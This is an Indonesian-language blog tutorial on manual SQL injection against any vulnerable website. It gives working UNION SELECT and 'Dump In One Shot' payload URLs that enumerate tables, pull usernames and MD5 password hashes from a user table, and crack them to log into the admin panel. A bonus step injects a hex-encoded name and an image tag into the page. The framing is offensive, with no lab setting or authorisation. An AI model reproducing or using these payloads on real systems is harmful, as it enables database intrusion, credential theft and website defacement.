Cara SQL Injection Manual Sekaligus Print Gambar
Cara SQL Injection Manual Sekaligus Print Gambar
.png)
Tutorial
1. Seperti biasa siapkan website yang vuln terhadap serangan Sql Injection , tandanya kalau vuln gimana min ?? kalau webnya vuln maka akan muncul error ketika kita memberi karater (') di parameternya. Untuk pesan error akan berbeda-beda yaa,salain itu jika website blank juga kemungkinan vuln
2. Selanjutnya adalah mencari jumlah tabel yang ada dalam database dengan menggunakan query Order by , contoh https://target.com/p?id=12'+ORDER+BY+1--+ , maka web akan normal kembali
3. Lanjutkan dengan mengganti angka 1 menjadi 2/3/4/5/6 dan seterusnya sampai muncul pesan error lagi
4. Nah disitu mimin error di angka 13, logikanya begini ketika kita melakukan perintah order by 1,2,3 dan seterusnya sampai 12 tidak error dan di nomor 13 terjadi error , itu artinya jumlah tabel yang ada didalam database tidak sampai 13 , lalu berapa jumlah tablenya min?? jumlah tabelnya yaitu 12 karena merupakan angka terakhir yang tidak error.
5. Berikutnya kita akan cari angka togelnya wkkw , gunakan perintah UNION SELECT, contohnya https://target.com/p?id=12'+UNION+SELECT+1,2,3,4,5,6--+ , untuk angkanya sesuaikan jumlah tabelnya di step nomor 4 ya
6. Maka akan keluar angka seperti diatas yang saya lingkari , disitu keluar angka 9 berarti kita bisa lakukan injeksi di angka tersebut, ganti angka 9 dengan perintah concat(database(),version()) , untuk mengetahui database dan versi yang digunakan , contohnya https://target.com/p?id=12'+UNION+SELECT+1,2,3,4,5,6,7,8,concat(database(),version()),10,11,12--+
7. Untuk melakukan dump table pada database kita gunakan query DIOS (Dump In One Shot) ,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x), contohnya seperti ini https://target.com/p?id=12'+UNION+SELECT+1,2,3,4,5,6,7,8,concat(database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),10,11,12--+
8. Disini kita sudah tau tabel & kolom di dalam database nya , disini saya akan dump data username dan password yang ada ditabel penggua caranya seperti ini ,https://target.com/p?id=12'+UNION+SELECT+1,2,3,4,5,6,7,8,group_concat(username,0x3a,passworduser),10,11,12+FROM+pengguna--+
9. Sudah muncul username dan password , akan tetapi password masih terenkripsi dengan tipe hash MD5 , kita decrypt terlebih dahulu dengan online tools KLIK DISINI
10. Username sudah , password juga sudah tinggal kita cari halaman adminnya saja kemudian login haha
11. Sekarang saatnya bonus trik , cara print image + nama , pertama kalian masuk DISINI untuk convert he HEX , kemudian isi dengan nama kalian atau apalah terserah kalian , kemudian copy HEX outputnya
12. Tamabhkan 0x didepan Hex output kalian , contoh 0x53716c20496e6a656374696f6e2 , kemudian masukan pada step nomor 7 , jadinya seperti ini https://target.com/p?id=12'+UNION+SELECT+1,2,3,4,5,6,7,8,concat(0x53716c20496e6a656374696f6e2,'<br>',database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),10,11,12--+
13. Untuk print gambar mudah sekali tinggal menambahka tag html <img src = "link-gambar.com/gambar.jpg"> , hasilnya kira kira seperti ini https://target.com/p?id=12'+UNION+SELECT+1,2,3,4,5,6,7,8,concat(0x53716c20496e6a656374696f6e2,'<br>','<img src ="link-gambar.com/gambar.jpg">',database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),10,11,12--+
Penutup
Oke sekian tutorial kali ini tentang "Cara SQL Injection Manual Sekaligus Print Gambar" semoga artikel ini bermanfaat dan sampai jumpa di artikel selanjutnya guys! Terimakasih.
